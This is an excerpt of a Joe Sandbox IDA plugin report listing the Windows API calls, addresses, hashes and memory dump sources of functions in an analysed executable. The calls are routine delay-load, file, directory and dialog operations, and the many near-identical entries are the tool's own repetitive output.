                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                                                              • Instruction ID: 40be3938acde55064429fedaa63ebf63c0b7ae5a423d0fdb3be58e557473fe60
                                                                                              • Opcode Fuzzy Hash: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                                                              • Instruction Fuzzy Hash: 60A011E22A80023C3A0822022C82CFB028EC0C0F28B30802EF820A00C0AC800C02A8B2
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                                                              • Opcode Fuzzy Hash: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00CA903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CA9F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00CBAE72,C:\Users\user\Desktop,00000000,00CE946A,00000006), ref: 00CBAC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CBC2B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 00CBC2C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00CBC2E0
                                                                                              • SetFocus.USER32(00000000), ref: 00CBC2E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CBC321
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CBC358
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00CBC36E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CBC38C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC39C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC3B8
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC3D4
                                                                                              • _swprintf.LIBCMT ref: 00CBC404
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
